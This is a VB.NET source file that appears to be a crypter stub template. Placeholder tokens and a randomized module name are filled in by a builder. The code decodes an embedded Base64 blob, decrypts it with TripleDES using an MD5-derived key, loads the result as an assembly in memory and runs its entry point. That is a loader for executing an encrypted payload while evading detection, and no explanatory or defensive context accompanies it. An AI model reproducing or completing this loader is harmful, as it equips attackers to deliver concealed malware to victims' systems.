﻿Imports System.Security.Cryptography
Imports System.Text

Module rNEXDSSyvIx


    Sub main()

        Dim %1% As String = "%2%"




        Dim %3% As Byte() = %5%(Convert.FromBase64String(%1%), "%6%")





        Dim %4% As System.Reflection.Assembly = System.Reflection.Assembly.Load(%3%)
        %4%.EntryPoint.Invoke(Nothing, Nothing)


    End Sub
    Public Function %5%(ByVal bytData() As Byte, _
        ByVal sKey As String, _
          Optional ByVal tMode As CipherMode = CipherMode.ECB, _
          Optional ByVal tPadding As PaddingMode = PaddingMode.PKCS7) As Byte()
        Dim keyArray As Byte()
        Dim hashmd5 As New MD5CryptoServiceProvider()
        keyArray = hashmd5.ComputeHash(UTF8Encoding.UTF8.GetBytes(sKey))
        hashmd5.Clear()

        Dim tdes As New TripleDESCryptoServiceProvider()
        tdes.Key = keyArray
        tdes.Mode = tMode
        tdes.Padding = tPadding

        Dim cTransform As ICryptoTransform = tdes.CreateDecryptor()
        Dim resultArray As Byte() = cTransform.TransformFinalBlock(bytData, 0, bytData.Length)
        tdes.Clear()
        Return resultArray
    End Function
End Module